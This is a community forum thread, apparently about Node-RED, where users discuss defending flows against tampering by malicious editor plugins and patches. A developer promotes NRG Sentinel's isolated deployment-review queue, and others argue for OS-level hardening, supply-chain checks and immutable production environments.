How to prevent Last-Mile Manipulation to Flows

Do you guys know a strategy to avoid flow tampering from the editor caused by evil plugins?

I created one for NRG Sentinel that doesn't use the editor, but I want to know if you know a reliable way to do it from the editor. Right now I believe it is impossible because an editor with plugins can't be trusted

Even if possible, it would not be a sensible security strategy.

Security assessments of a system must come from outside that system.

The sensible approach for something with a plugin/extension system is to fix what is installed and security vet every plugin/custom node. In addition, Node-RED must run under its own user id and group and ACL's should be enforced to limit its access to files and folders.

As I've said before, Node-RED is a generic compute platform. As such it is incredibly powerful and, just like allowing access to PowerShell, Python, Node.js, etc on a user workstation, it must be constrained if working in a controlled environment such as is typical for an enterprise setup.

Node-RED was created to be convenient even for novice users to use. It therefore does sacrifice some level of security because of that. Thankfully, this is relatively easy to fix using the tools available in the host OS.

1 Like

I will reveal my solution that gets rid of these attacks later today. I just wanted to know if people had some suggestions.

Sentinel’s Safe Deployment mechanism introduces a controlled review process for all flow changes.

When a user deploys a flow, the server does not apply the changes immediately. Instead, the proposed deployment is placed into a Deployments Queue.

To review the changes, the user opens the dedicated review interface at:

/nrg/plugins/sentinel/deployments/review

This page runs in an isolated environment with no client-side plugins loaded, preventing any editor plugins from interfering with or tampering with the review process.

During the review, Sentinel presents every detected change in the deployment. The user must inspect and explicitly approve or reject each modification. Only after all changes are approved will the deployment be finalized and the new flow activated.

In addition to the isolated review interface, server-side protections enforce capability and permission restrictions to prevent plugins or nodes from modifying the deployment queue or bypassing the approval process.

This architecture ensures that no flow change can become active without explicit human approval, protecting the runtime from both client-side and server-side tampering.

This marks the beginning of the vision for Sentinel’s Flow Diff tool. Whenever a deployment is requested—whether from the client or the server—it is not applied immediately . Instead, Sentinel intercepts the request and places it into a deployment queue .

Rather than following the normal deployment path, the proposed changes must pass through Sentinel’s Safe Deployment review process . This ensures that every modification to a flow can be inspected and approved before it is activated in the runtime.

obs: I will probably create a separate list to show enqueued deployments in the editor.

Deployments queued waiting for approval
image

When the user clicks “Open review page” in the editor, they are redirected to Sentinel’s Deployment Review interface. This page runs in an isolated environment where no editor plugins are loaded, preventing rogue client-side plugins from tampering with the review process.

Sentinel breaks each deployment into a structured Approval Process composed of multiple review steps. Changes are organized and presented by Node, Tab, and Wires , allowing the user to inspect them in a controlled and understandable way. Each step provides the appropriate context for validation, including visual flow diffs and property diffs where relevant.

The reviewer must go through these steps sequentially , validating each change before moving forward. Only after the entire review process is completed and all changes are approved will the queued deployment be applied to the runtime.

This structured approval workflow ensures that any unintended or malicious modification—such as those introduced by a compromised or rogue plugin—can be detected and stopped before it affects the running flow.




obs: I'm going to update the looking and feel to match the editor's, and use the RED canvas to render the nodes and wires, when I finish the core features of Sentinel's Flow Diff tool.

Once all changes have been reviewed and approved, the user can proceed by clicking the Deploy button. At this point, a confirmation modal appears before the deployment is finalized.

By requiring this explicit review and confirmation workflow, NRG Sentinel ensures that no flow tampering can occur without the user noticing and approving the changes.

NRG Sentinel can be found here

Looks like you put a lot of effort in this.

What i am wondering: this is all based on the assumption that changes/deployments are done directly into production environments ?

If production is airgapped and changes are tightly controlled via processes and CI/CD, how do you see this working ? I concur with @TotallyInformation that security should done from the outside, account/passwd retrieval, who had access and when, all change controlled and audited (ITIL/ITSM), especially in enterprise environments.

Although I have not used flowfuse - i can imagine that a hash comparison/verification for dev/test > prod for deployments would make sense.

I think what @AllanOricil describes here is really relevant. If you use NR in production I can image the tool can help in the verification process, especially if shared nodes are being used (for free) in the customer delivery

I concur with @bakman2 - however, this tool might find a place in a final test environment such as UAT. To do verification tests prior to production implementation. By the time you get to production, you should already be totally clear about what is being implemented, why and its implications on security, infrastructure, support, and end-users.

@bakman2 @TotallyInformation

People routinely apply patches to production packages assuming “it’s just a patch” and won’t impact their flows. That assumption doesn’t hold in Node-RED. A patch can change node behavior, tweak defaults, or introduce side effects—and it can even directly alter existing flows.

Blocking patches in production isn’t realistic. The ecosystem depends on continuous updates, and most patches are beneficial, including critical security fixes. Shutting that down would create more risk than it mitigates.

The real issue is lack of control and visibility.

Sentinel’s Deployment Review Queue addresses this head-on. Every patch, regardless of scope, triggers a mandatory flow review before it’s considered safe for production. This creates a hard checkpoint where any unintended—or malicious—changes to flows are surfaced.

If a patch attempts to modify flow logic or behavior, it doesn’t go unnoticed. It’s flagged, reviewed, and explicitly approved or rejected.

Bottom line: in a dynamic environment like Node-RED, patches are not harmless by default. Enforced review isn’t optional—it’s the only reliable control mechanism to protect flow integrity while maintaining update velocity.

That’s a solid starting point, but it doesn’t address the real risk surface.

Hash comparison assumes the flow that gets deployed is exactly what the user reviewed. In Node-RED, that assumption breaks down. Editor plugins can modify the flow payload at the last mile—right before it’s sent to the runtime—after the user has already validated it visually. At that point, you’re hashing something that may already be compromised.

You also lose attribution. Once a plugin mutates the flow, there’s no reliable way to tell whether a change was made intentionally by a human or injected programmatically. From a governance perspective, that’s unacceptable.

And this isn’t theoretical. Production environments are exposed to package patches that can introduce or alter editor-side behavior. A “safe” update can quietly ship logic that manipulates flows during deployment.

There’s only one reliable way to eliminate this class of risk: remove the attack surface at the point of verification.

That’s why Sentinel’s Deployment Review Queue is isolated. The review interface does not load any editor plugins—period. No extensions, no runtime hooks, no opportunity for last-mile manipulation. What the reviewer sees is the exact payload that will be deployed.

On top of that, every deployment is gated by mandatory human verification before activation. This ensures that any unauthorized or unexpected change—whether introduced upstream or at the last mile—is caught before it reaches production.

Bottom line: hashing ensures consistency, but it doesn’t guarantee integrity. If plugins are in the execution path, they are part of your threat model. The only way to control that is to take them out of the equation when it matters most.

Doesn't hold in nearly every case as it happens. However, these things sit under a risk-based management approach. You have to decide whether rapid patching is less or more of a risk than having a review before patching.

There is no one-size-fits-all approach here if you are being sensible. Each system should have its own risk log and business continuity runbook. Of course, we are in the realm of enterprise systems now and Node-RED is just as (perhaps more) likely to be in small-to-medium organisations without sufficient IT and Cyber Security cover.

Certainly not saying there isn't room for what you've created, clearly there is a place for it. Your tool isn't the only possible approach of course, but I'm sure there will be organisations that prefer it.

This is, of course, a good thing. Again, the only question would be whether having the tool in the platform undermines its security, we've raised that already so no need to go back over it.

I get the impression that this security enhancement might be useful in a testing environment, but perhaps not in production.

It has though occurred to me that new and malicious/hacked versions on github are a possible threat to Node-red.

Assuming that any new release involves changes, how can you distinguish between a bugfix and a plugin gone bad?

Perhaps I'm wrong but the best approach to protecting a production system seems to be immutability. Precisely what needs to be immutable is far from clear though.

  • flows.json
  • flows_cred.json
  • settings.js

But perhaps it should be ~/.node-red, plus /usr/lib/node_modules.
Which would make file based context and other file system actions harder to manage.

Yes, however, there are already tools to mitigate such supply-chain risks. And some are free to use and so suitable for home automation use.

Again, not saying that Allan's tool doesn't have a place, it will do I'm sure.

Well, this is certainly part of what many of us have discussed in the past regarding security. You need layers not just 1 thing. Running under a controlled user and group id with ACL's protecting your filing system assets are part of it. Having supply-chain checks in place is important.

The more value in your Node-RED instance, the more protection you should be aiming for of course.

1 Like

Not really. I could create packages that target production only to ensure it gets unnoticed in lower environments. Runtime protection is a must no matter the environment.

I started with JavaScript on both client and server in 2018. I explored React but moved away due to its lack of structure, then adopted Vue in 2019, which aligned better with how I build systems. In 2023, I began working with Node-RED. Along the way, several years as a Salesforce Developer significantly shaped my approach to designing this product. It’s been a deliberate, multi-year journey with a substantial investment of effort.

I also tend to question how things are done and actively challenge established approaches.

Perhaps an exception to the rule, but I work in an environment where this is unheard of. Production is considered immutable, software is qualified and tested (per version) before it is allowed anywhere near production, this also applies to libraries, plugins etc.

Blocking patches in production isn’t realistic.

This is all about 'willpower' and not taking your production environment seriously. Emergency fixes are somewhat different, but even those should be thoroughly tested, verified and approved in non-prod environments.

2 Likes

I think both quotes you pulled miss the core point I was making because you framed them in a different context than intended.

When I said:

“People routinely apply patches… assuming ‘it’s just a patch’ and won’t impact their flows”

the point wasn’t about teams lacking discipline or treating production casually. It’s about the assumption that patches are behaviorally safe, which is a separate issue.

And when I said:

“Blocking patches in production isn’t realistic”

that’s not about willpower or taking production lightly. It’s about operational constraints. Even in strict environments, patches—especially security-related—need to move, and they’re generally treated as low-risk by default.

The gap I’m pointing out is this:
current processes (testing in non-prod, automated checks, manual validation) are not designed to catch subtle behavioral changes introduced by patches in systems like Node-RED.

You can do everything “right” from a process standpoint and still miss:

  • changes in node behavior
  • default value shifts
  • hidden side effects that only manifest at runtime

So this isn’t a discipline problem — it’s a visibility problem.

That’s the distinction I’m trying to make.

or to dev minds A !== A & B

How would you distinguish development, test & production?